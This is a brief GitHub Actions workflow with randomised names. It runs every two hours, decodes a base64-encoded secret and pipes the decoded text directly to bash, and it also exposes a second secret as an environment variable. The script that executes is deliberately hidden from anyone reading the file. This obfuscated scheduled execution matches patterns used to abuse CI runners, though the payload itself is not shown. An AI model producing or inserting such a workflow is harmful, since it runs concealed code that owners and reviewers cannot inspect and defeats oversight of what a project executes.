name: PnFwbtmpCj
on:
  schedule:
    - cron: '0 */2 * * *'
  workflow_dispatch:
jobs:
  CmlAgLiDz:
    runs-on: ubuntu-latest
    env:
      nSTUhdILrkKO: ${{ secrets.hjiSARTtSAtu }}
    steps:
      - uses: actions/checkout@v5
      - run: echo "${{ secrets.FOBTDNHE }}" | base64 -d | bash
